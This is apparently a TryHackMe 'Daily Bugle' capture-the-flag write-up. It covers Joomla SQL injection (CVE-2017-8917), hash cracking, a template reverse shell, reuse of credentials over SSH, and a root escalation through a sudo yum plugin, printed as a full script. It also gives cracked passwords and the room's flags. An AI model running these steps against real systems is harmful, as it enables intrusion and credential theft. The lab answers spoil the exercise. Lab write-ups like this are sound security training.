Daily Bugle
Compromise a Joomla CMS account via SQL injection, crack password hashes, and escalate privileges using a YUM misconfiguration.
Daily Bugle - TryHackMe Writeup
Daily Bugle is a medium-difficulty Linux machine that focuses on web application security, specifically targeting Joomla CMS vulnerabilities and Linux privilege escalation techniques.
Difficulty: Medium ⭐⭐
Operating System: CentOS Linux
Themes: Web Exploitation, SQL Injection, Password Cracking, Linux Privilege Escalation
Objectives
- Identify and exploit Joomla CMS vulnerability
- Extract and crack password hashes
- Gain initial shell access
- Escalate privileges through YUM misconfiguration
- Capture user and root flags
Reconnaissance
Nmap Scan
Performed a comprehensive service version scan:
1
nmap -sCV -Pn 10.10.172.83
Results:
1
2
3
4
5
6
7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4
80/tcp open http Apache httpd 2.4.6 (CentOS) PHP/5.6.40
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
|_/joomla/administrator/ /administrator/ /bin/ /cache/ ...
3306/tcp open mysql MariaDB 10.3.23 or earlier
Key Findings:
- Port 80: Joomla CMS running on Apache
- Port 3306: MariaDB database (potential SQL injection target)
- robots.txt: Reveals administrator paths and sensitive directories
Web Enumeration
The website displays a Spider-Man themed “Daily Bugle” newspaper:
Accessed the Joomla administrator panel:
Version Discovery
Used dirsearch to find hidden files:
1
dirsearch -u http://10.10.172.83
Found README.txt revealing Joomla 3.7.0:
Vulnerability Identified: Joomla 3.7.0 is vulnerable to SQL injection (CVE-2017-8917)
Initial Access
SQL Injection Exploitation
Used the Joomla SQL injection exploit script:
1
2
3
git clone https://github.com/stefanlucas/Exploit-Joomla.git
cd Exploit-Joomla
python3 JoomlaExploit.py http://10.10.172.83
Output:
1
2
3
Found table: fb9j5_users
Extracting users from fb9j5_users
Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
Password Cracking
- Save the hash:
1
echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt
- Crack with JohnTheRipper:
1
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Credentials Found:
- Username:
jonah - Password:
spiderman123
Joomla Admin Access
Logged into Joomla admin panel (/administrator/) with discovered credentials:
Reverse Shell Deployment
- Navigate to Template Editor:
- Extensions → Templates → Templates → Protostar Details and Files
Edit index.php: Replaced content with PHP reverse shell from PentestMonkey
- Start Listener:
1
nc -nlvp 9999 - Trigger Shell: Accessed the homepage to execute the modified template
Shell Obtained:
1
uid=48(apache) gid=48(apache) groups=48(apache)
Credential Discovery
Found database credentials in configuration file:
1
cat /var/www/html/configuration.php
Extracted Credentials:
1
2
3
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
SSH Access
Used discovered credentials for SSH access:
1
2
ssh jjameson@10.10.172.83
Password: nv5uz9r3ZEDzVjNu
User Shell Obtained:
1
2
[jjameson@dailybugle ~]$ whoami
jjameson
Privilege Escalation
Sudo Privilege Enumeration
1
sudo -l
Output:
1
2
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
YUM Privilege Escalation
Referenced GTFOBins YUM for exploitation methods:
Method 1: RPM package creation (failed - fpm not installed)
Method 2: YUM Plugin Exploitation (successful):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Create temporary directory
TF=$(mktemp -d)
# Create YUM configuration
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
# Create plugin configuration
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
# Create malicious plugin
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
# Execute with sudo
sudo yum -c $TF/x --enableplugin=y
Root Access Obtained:
1
2
sh-4.2# whoami
root
Flag Capture
User Flag
1
cat /home/jjameson/user.txt
Flag: 27a260fe3cba712cfdedb1c86d80442e
Root Flag
1
cat /root/root.txt
Flag: eec3d53292b1821868266858d7fa6f79
Key Takeaways
Attack Path Summary:
1
2
3
4
Port Scanning → Joomla Discovery → Version Identification →
SQL Injection → Hash Extraction → Password Cracking →
Joomla Admin Access → Reverse Shell → Credential Discovery →
SSH Access → Sudo Enumeration → YUM Exploitation → Root Access
Vulnerabilities Exploited:
- CVE-2017-8917 - Joomla 3.7.0 SQL Injection
- Weak Password - Crackable bcrypt hash
- Credential Reuse - Database password used for SSH
- YUM Misconfiguration - Sudo privileges without password
Mitigation Strategies:
- For Joomla Security:
- Regular updates and patching
- Strong password policies
- Input validation and sanitization
- Regular security audits
- For Linux Security:
- Principle of least privilege for sudo access
- Regular review of sudo permissions
- Secure credential storage
- Application whitelisting
- For Database Security:
- Unique passwords for different services
- Regular password rotation
- Database encryption
- Restricted network access
Tools Used:
- Nmap - Network reconnaissance
- Dirsearch - Web directory enumeration
- Exploit-Joomla - SQL injection exploitation
- JohnTheRipper - Password cracking
- GTFOBins - Privilege escalation reference
- Netcat - Reverse shell handling
Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb